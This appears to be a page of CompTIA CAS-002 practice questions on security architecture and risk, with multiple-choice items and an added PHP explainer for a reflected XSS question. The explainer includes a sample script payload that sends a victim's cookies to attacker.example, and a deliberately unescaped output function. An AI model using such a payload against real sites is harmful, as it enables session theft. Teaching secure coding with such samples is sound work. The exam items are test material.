CAS-002 Exam Details

  • Exam Code: CAS-002
  • Exam Name: CompTIA Advanced Security Practitioner (CASP+)
  • Certification: CompTIA Certifications
  • Vendor: CompTIA
  • Total Questions: 733 Q&As
  • Last Updated: Jan 22, 2024

CompTIA CAS-002 Online Questions & Answers

  • Question 671:

    Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?

    A. Single sign-on
    B. Identity propagation
    C. Remote attestation
    D. Secure code review

  • Question 672:

    When Company A and Company B merged, the network security administrator for Company A was tasked with joining the two networks. Which of the following should be done FIRST?

    A. Implement a unified IPv6 addressing scheme on the entire network.
    B. Conduct a penetration test of Company B's network.
    C. Perform a vulnerability assessment on Company B's network.
    D. Perform a peer code review on Company B's application.

  • Question 673:

    An intrusion detection system logged an attack attempt from a remote IP address. One week later, the attacker successfully compromised the network. Which of the following MOST likely occurred?

    A. The IDS generated too many false negatives.
    B. The attack occurred after hours.
    C. The IDS generated too many false positives.
    D. No one was reviewing the IDS event logs.

  • Question 674:

    A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology?

    A. Insider threat
    B. Network reconnaissance
    C. Physical security
    D. Industrial espionage

  • Question 675:

    Joe, the Chief Executive Officer (CEO), was an information security professor and a subject matter expert for over 20 years. He has designed a network defense method which he says is significantly better than prominent international standards. He has recommended that the company use his cryptographic method.

    Which of the following methodologies should be adopted?

    A. The company should develop an in-house solution and keep the algorithm a secret.
    B. The company should use the CEO's encryption scheme.
    C. The company should use a mixture of both systems to meet minimum standards.
    D. The company should use the method recommended by other respected information security organizations.

  • Question 676:

    An organization is selecting a SaaS provider to replace its legacy, in-house Customer Relationship Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?

    A. Ensure the SaaS provider supports dual factor authentication.
    B. Ensure the SaaS provider supports encrypted password transmission and storage.
    C. Ensure the SaaS provider supports secure hash file exchange.
    D. Ensure the SaaS provider supports role-based access control.
    E. Ensure the SaaS provider supports directory services federation.

  • Question 677:

    A security company is developing a new cloud-based log analytics platform. Its purpose is to allow:

      • Customers to upload their log files to the "big data" platform
      • Customers to perform remote log search
      • Customers to integrate into the platform using an API so that third party business intelligence tools can be used for the purpose of trending, insights, and/or discovery

    Which of the following are the BEST security considerations to protect data from one customer being disclosed to other customers? (Select THREE).

    A. Secure storage and transmission of API keys
    B. Secure protocols for transmission of log files and search results
    C. At least two years retention of log files in case of e-discovery requests
    D. Multi-tenancy with RBAC support
    E. Sanitizing filters to prevent upload of sensitive log file contents
    F. Encrypted storage of all customer log files

  • Question 678:

    A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings?

    A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects.
    B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution.
    C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness.
    D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

  • Question 679:

    A small company hosting multiple virtualized client servers on a single host is considering adding a new host to create a cluster. The new host hardware and operating system will be different from the first host, but the underlying virtualization technology will be compatible. Both hosts will be connected to a shared iSCSI storage solution. Which of the following is the hosting company MOST likely trying to achieve?

    A. Increased customer data availability
    B. Increased customer data confidentiality
    C. Increased security through provisioning
    D. Increased security through data integrity

  • Question 680:

    Which of the following vulnerabilities is present in the below source code file named `AuthenticatedArea.php'?

    <?php
    $username = $_REQUEST['username'];
    if ($username != "") {
        echo "Your username is: " . $_REQUEST['username'];
    } else {
        header("location: /login.php");
    }
    ?>

    A. Header manipulation
    B. Account disclosure
    C. Unvalidated file inclusion
    D. Cross-site scripting
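    The sink in the question is a reflected cross-site scripting bug: whatever arrives in the username parameter is concatenated into the HTML body unescaped. The following is an added example, not part of the exam question or of any CompTIA material, that places that sink beside a hardened version. The function names, the `authenticated_area()` wiring and the attack string are constructed for illustration, and the page is assumed to be served as UTF-8 text/html.

```php
<?php
// Added example, not part of the exam question. Shows the reflected XSS in
// AuthenticatedArea.php next to a hardened form. Function names and the
// sample attack value are constructed for illustration; the page is assumed
// to be served as UTF-8 text/html.
declare(strict_types=1);

// Mirrors the original sink: request data is concatenated straight into the
// HTML body, so any markup supplied in ?username= is parsed by the browser.
function render_vulnerable(array $request): string
{
    $username = $request['username'] ?? '';
    if ($username != '') {
        return 'Your username is: ' . $username;
    }
    return '';
}

// Hardened: the same output, escaped for an HTML body context. ENT_QUOTES
// also covers attribute contexts, and ENT_SUBSTITUTE keeps a malformed UTF-8
// sequence from silently turning the whole output into an empty string.
function render_hardened(array $request): string
{
    $username = $request['username'] ?? '';
    if (!is_string($username) || $username === '') {
        return '';
    }
    return 'Your username is: '
        . htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// How the page itself should be wired (assumed layout, not the original
// file). $_REQUEST merges GET, POST and cookie values, so on an authenticated
// page the name should come from the session that proved the login, not from
// the request. The redirect must be followed by exit; header() alone does not
// stop the script, and everything after it still executes.
function authenticated_area(): void
{
    session_start();
    $username = $_SESSION['username'] ?? '';
    if (!is_string($username) || $username === '') {
        header('Location: /login.php', true, 302);
        exit;
    }
    header('Content-Type: text/html; charset=UTF-8');
    echo render_hardened(['username' => $username]);
}

// Constructed sample input: the value an attacker places in the username
// parameter of a link sent to a victim who is logged in.
$attack = [
    'username' => '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
];

// The vulnerable renderer passes the script element through unchanged; the
// hardened one emits it as escaped text that the browser shows but never runs.
echo render_vulnerable($attack), PHP_EOL;
echo render_hardened($attack), PHP_EOL;
```

    Run it from the command line with `php AuthenticatedArea-example.php` and compare the two lines. Escaping at the output is the fix for the question's answer; the session-sourced username and the `exit` after the redirect are the two additional defects a reviewer would flag in the original file, since a script that keeps running after `header("location: ...")` still echoes the page body to an unauthenticated caller.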

Tips on How to Prepare for the Exams

Nowadays, certification exams are becoming more and more important and are required by more and more enterprises when applying for a job. But how do you prepare for the exam effectively? How do you prepare for the exam in a short time with less effort? How do you get an ideal result, and how do you find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provides not only CompTIA exam questions, answers and explanations but also complete assistance with your exam preparation and certification application. If you are unsure about your CAS-002 exam preparation or your CompTIA certification application, do not hesitate to visit Vcedump.com to find your solutions.